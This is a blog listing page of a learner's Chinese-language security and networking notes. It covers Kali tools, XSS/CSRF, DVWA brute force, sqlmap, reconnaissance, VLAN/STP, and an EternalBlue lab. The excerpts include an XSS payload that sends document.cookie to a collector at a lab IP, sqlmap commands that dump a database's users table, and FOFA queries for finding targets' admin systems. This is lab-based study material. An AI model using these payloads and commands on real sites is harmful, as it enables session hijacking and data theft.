笔记
文章平均质量分 67
玉米同学
新手请指教。
展开
-
解决虚拟机和主机网络通信问题
1)检查虚拟网卡有没有被禁用2)检查虚拟机与物理机是否在一个VMNet中3)检查虚拟机的IP地址与物理机对应的VMNet是否在一个网段4)检查虚拟机与物理机的防火墙是否允许PING,不行的话干脆全部关闭...原创 2021-06-17 10:33:01 · 3323 阅读 · 0 评论 -
kali 探测主机命令
arping:特定ip再网络中是否在线fping:探测特定ip是否在线hping 打开tcl交互式页面nbtscan探测目标主机netbios名字 服务进程nping 支持多协议p0f被动探测目标主机操作系统类型xprobe2探测操作系统...原创 2021-06-15 17:30:40 · 560 阅读 · 0 评论 -
XSS和CSRF总结
学完xss和csrf之后,感觉二者极其容易混淆,所以这里做一个总结和区分。网上看了一些解释发现五花八门,看的我云里雾里了,最后看了官方文档才xue'ming'b原创 2021-06-06 14:07:01 · 306 阅读 · 3 评论 -
存储型XSS清除方法
今天也是被自己气哭的一天今天做XSS盗取cookie实验<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>就是用这个罪恶的p原创 2021-06-06 12:20:33 · 2029 阅读 · 4 评论 -
信息搜集篇
壹fofa既可以搜索到部分子域名,也可以搜索到目标的各种系统,如OA、后台等等,而这些系统很容易成为突破口。今天学习了用fofa搜集信息的一些方法以及技巧:title="目标名称" && region="xx省"title="目标名称" && city="xx市"cert="目标域名或者证书关键字" && region="xx省"cert="目标域名或者证书关键字" && city="xx市"((title="目标名称" || h原创 2021-06-06 09:11:51 · 87 阅读 · 0 评论 -
openRASP安装教程
RASP管理后台安装首先需要两个数据库,Elasticsearch和MongoDB,es用来存储报警和统计信息,mongo用来存储应用、账号密码等信息。目前对数据库的要求是MongoDB版本大于等于3.6ElasticSearch版本大于等于5.6,小于7.0我们使用docker安装这两个数据库,因为数据库一旦错误可以删除docker环境重新搭建。docker环境安装ElaticSearch安装因为版本要求在[5.6, 7.0)我们这里安装6.5.4版本。docker p原创 2021-06-03 15:58:08 · 1400 阅读 · 0 评论 -
DVWA------暴力破解(全级别详解)
DVWA安装教程:https://www.cnblogs.com/lsdb/p/6826519.htmlBrute Force(暴力破解)两个字:撞库三个字:枚举法暴力破解的意思是攻击者借助计算机的高速计算不停枚举所有可能的用户名和密码,直到尝试出正确的组合,成功登录系统。理论上,只要字典足够大,破解总是会成功的。阻止暴力破解的最有效方式是设置复杂的密码(英文字母大小写、数字、符号混合)。而如果你的字典是从某网站泄露出来的,你使用它试图登陆其他网站,就便是撞库。撞库攻击的成功率高于暴力破解,原创 2021-05-26 19:02:11 · 18265 阅读 · 6 评论 -
Python V-ing 变化小程序
先区分规则1.一般情况下,在动词词尾直接加-ing,2、以一个字母-e结尾的单词,去掉字母-e,再加-ing3、以重读闭音节结尾,即“辅+元+辅”结尾的动词,先双写末尾的辅音字母,再加-ing。4、以-ie结尾的动词,把-ie改为-y,再加-ing。分别对应定义四个方法利用数组定义和截取相应部分,并进行拼接:利用if对截取部分进行判断再分别调用方法进行动词的转换:运行结果:...原创 2021-05-24 11:20:55 · 218 阅读 · 0 评论 -
DVWA-----sql盲注
抓包sqlmap跑数据sqlmap -r 1.txt -dbssqlmap -r 1.txt -D dvwa -dump-allsqlmap -r 1.txt -D dvwa -tablessqlmap -r 1.txt -D dvwa -T users -dump原创 2021-05-20 21:28:25 · 114 阅读 · 0 评论 -
kali工具安装
汉化火狐浏览器:先执行命令:apt -y install firefox-esr-l10n-zh-cn(中途选择y)再打开火狐浏览器:安装google拼音输入法使用命令 apt-get install fcitx 安装输入法框架使用命令 apt-get install fcitx-googlepinyin 安装谷歌输入法安装beefapt-get install beef-xss配置密码/etc/beef-xss/config.yaml 默认用户名beef修改用户名或者密码,注意原创 2021-05-19 17:50:12 · 824 阅读 · 0 评论 -
gobuster,medusa,nmap,zmap
ATT&CK:针对网络攻击行为的知识库,囊括攻击生命周期以及每个攻击阶段的目标。https://www.ddosi.com/att/备案号查询:www.beianbeian.com是否存在CDN:nslookup+域名Ping 网站有:http://ping.chinaz.com/http://ping.aizhan.com/http://ce.cloud.360.cn/查看 IP 与 域名绑定的历史记录,可能会存在使用 CDN 前的记录,相关查询网站有:https://dnsd原创 2021-05-16 16:27:35 · 375 阅读 · 0 评论 -
pycharm修改默认存储路径
今天查看磁盘时,发现我的C盘内存堪忧。后来发现我的PyCharm的默认路径竟然在C盘!于是我pycharm—>file—>setting—>appearance—>system setting—>project opening—>default directory 选择路径设置完一定要记得点OK!!然后找到我们pycharm安装的盘,打开bin文件夹的idea文件咱们需要修改两个地方如下图把${user.home}修改为你修改的路径 我的路径是E:\p原创 2021-05-07 10:22:13 · 32609 阅读 · 20 评论 -
OSPF
文章目录上次,上传了一个关于RIP实验的一个资源,相信自己已经初步掌握了一些关于RIP的知识及操作。先回顾一下RIP的度量规则:RIP是以跳数为度量值的,即所经路由器的个数,哪条路少用哪条。可是,这将忽略了一个问题:这条路好走吗通畅吗网速好吗?也就是带宽的问题。这条路走不走的快不仅取决于有几个中转站(路由器),还取决于这条路是不是高速(带宽)公路。显然,以跳数评估的路由并非最优路径。此外,RIP还有 收敛速度慢,最大跳数16导致网络尺度小,更新发送全部路由表浪费网络资源等缺点。所以今天要学原创 2021-04-22 19:16:31 · 131 阅读 · 1 评论 -
网络----DHCP,中继器,DHCP攻击
文章目录引入中继实验1中继实验2DHCP攻击实验攻击3种类型攻击实验引入1.DHCP客户端初次接入网络时,会发送DHCP发现报文(DHCP Discover),用于查找和定位DHCP服务器。2.DHCP服务器在收到DHCP发现报文后,发送DHCP提供报文(DHCP Offer),此报文中包含IP地址等配置信息。3.在DHCP客户端收到服务器发送的DHCP提供报文后,会发送DHCP请求报文(DHCP Request),另外在DHCP客户端获取IP地址并重启后,同样也会发送DHCP请求报文,用于确认分配原创 2021-04-15 21:47:36 · 707 阅读 · 1 评论 -
三层交换机配置
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210413102703235.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDMzOTgzMg==,size_16,color_FFFFFF,t_70)原创 2021-04-14 07:35:44 · 1037 阅读 · 0 评论 -
静态路由配置
分片IDDFMF查看路由表的方式:display ip routing-table路由表分类:直连路由:静态路由:动态路由:路由表内容:目标网段子网掩码下一跳IP出接口(逃出接口)优先级(管理距离):去往相同网段的不同协议,谁小谁优先。度量值:如果协议优先级相同,比较开销,即度量值,谁小谁优先。最长匹配原则:子网掩码越长,路由越精确。...原创 2021-04-11 16:15:39 · 935 阅读 · 0 评论 -
Eth-Trunk捆绑技术
在网络中,如果遇到了带宽不够的问题,通常会选择升级链路或者是进行链路捆绑,具体选择哪种方案,是要根据性价比来决定的。在实际的工程中,若要为客户升级带宽,则可以通过链路捆绑和升级带宽的方法来实现,在设计方面的建议是如果捆绑两条链路可以满足需求,那么可以进行捆绑,如果需要捆绑4条甚至是更多,就考虑升级带宽。Eth-Trunk( 链路聚合技术 )作为一种捆绑技术,可以把多个独立的物理接口绑定在一起作为一个大带宽的逻辑接口使用,这样既不用替换接口板也不会浪费IP地址资源。Eth-Trunk是一种将多个以原创 2021-04-08 20:28:29 · 1181 阅读 · 0 评论 -
RSTP
文章目录RSTP rapid 快速生成树协议Backport(备份端口)Alternate port(替代端口)接口状态BPDUSTP响应时间长,工作慢,不能维护网络中的多个VLAN形成的环路初始化到收敛至少经过30s,至多50sRSTP rapid 快速生成树协议根接口,指定接口,替代接口,备份接口。Backport(备份端口)是指定端口的备份,是收到自己的BPDU被阻塞的接口。在交换机的同一网段多个接口中,选举一个为该网段的指定接口,其他接口为备份接口。一般处于丢弃状态。如图,SW1作为原创 2021-04-08 10:58:57 · 1191 阅读 · 0 评论 -
STP 状态机制 ● 拓扑变更 ● STP的特性●选举过程●计时器
文章目录导入STP的选举过程选举根桥选举根端口选举指定端口最后选出 阻塞端口(非指定端口)STP的状态机制拓扑变更机制STP计时器STP特性导入单点故障(是指系统中一点失效,就会让整个系统无法运作的部件,换句话说,单点故障即会整体故障。冗余:解决单点故障(对原本的单一部分进行备份,以达到增强其安全性的目的)。副作用:广播风暴多帧复制MAC地址表抖动STP协议:解决上述问题,在保证冗余的同时又不会有环路的危害STP的选举过程选举根桥桥优先级+MAC地址 优先级的范围0-65535原创 2021-04-06 22:33:19 · 672 阅读 · 0 评论 -
网络-----trunk GVRP
ACCESS端口Untagged端口,即接入端口Access端口只能属于1个VLAN,它发送的帧一般不带有VLAN标签,用于连接计算机的端口Trunk端口Tag Aware端口,即干道接口可以允许多个VLAN通过,它发出的帧一般是带有VLAN标签的,用于交换机之间连接的端口3~ 2 ~ 1 ~记好了吗?来测试一下:autodesireabletrunkaccestrunkdesireabletrunkacces原创 2021-04-04 10:01:50 · 450 阅读 · 0 评论 -
VLAN
目录VLAN简述MAC泛洪pc1 ping pc3 的过程七层模型功能MUX VLAN主VLAN (Principal VLAN)从VLAN(Subordinate VLAN)VLAN简述也就是说vlan路由器可以划分vlan,但它的主要用途不是划分vlanMAC泛洪数据包分为 ICMP request(请求) 和 ICMP replay(回复)pc1 ping pc3 的过程1.pc1封装数据包,封装到二层时,查询ARP缓存表,没有1.3的目标mac地址,封装失败。2.但原创 2021-04-01 23:33:30 · 578 阅读 · 0 评论 -
RHEL7.3无法联网
虚拟机rhel7.3无法联网 ping不通8.8.8.8解决方法:systemctl status NetworkManager 查看NetworkManager状态显然是关闭的,不然我就不用写这篇文章了好的现在我们用一个命令来给他开启systemctl start NetworkManager再查看systemctl status NetworkManager已经是开启的了再用nmtui配置和激活网络然后把windows的这个地方挑勾√然后嘞 再去ping就可以ping通了但是发原创 2021-03-02 18:03:00 · 490 阅读 · 0 评论 -
kali攻击blue(win7)靶机
目录1.找到目标靶机2.进行漏洞探测,识别服务3.漏洞识别与发现1)探测永恒之蓝漏洞2)进行漏洞利用,获取权限3)在目标靶机写入一个文件配置blue IP地址(需要和kali处于同一网段,但最后一位不相同)KALI的主机IP地址为:192.168.179.128(用root)在KALI中ping通blue的地址,出现time即成功1.找到目标靶机nmap -p 445 192.168.179.0/24Nmap scan report for 192.168.179.1Host is up (原创 2020-12-28 20:42:20 · 4241 阅读 · 0 评论 -
Wannacry(永恒之蓝)病毒
一、Wannacry(永恒之蓝)病毒 2017.04-051)一种“蠕虫式”的勒索病毒软件,大小3.3MB,勒索病毒肆虐。2)由不法分子利用NSA(美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播。3)中国部分Windows操作系统用户遭受感染,校园网用户首当其冲,受害严重,大量实验室数据和毕业设计被锁定加密。部分大型企业的应用系统和数据库文件被加密后,无法正常工作,影响巨大。4)文件被加密,要求支付高比特币。5)比特币:比特币是一种P2P形式的虚拟的加密数字货币原创 2020-12-28 16:32:43 · 4821 阅读 · 1 评论 -
#mysql增删查改(不完整版)
目录数据库创建数据库选择数据库修改数据库删除数据库数据表增插入一行记录:插入多行记录sql转中文方法删删除数据记录清空表的数据改修改数据记录查显示所有表名称查看所有字段查看表的内容数据库创建数据库create database 名;选择数据库use 名;修改数据库ALTER DATABASE [数据库名] { [ DEFAULT ] CHARACTER SET <字符集名>eg:使用命令行工具将数据库student的指定字符集修改为 gb2312,alter database原创 2020-12-07 20:38:51 · 125 阅读 · 0 评论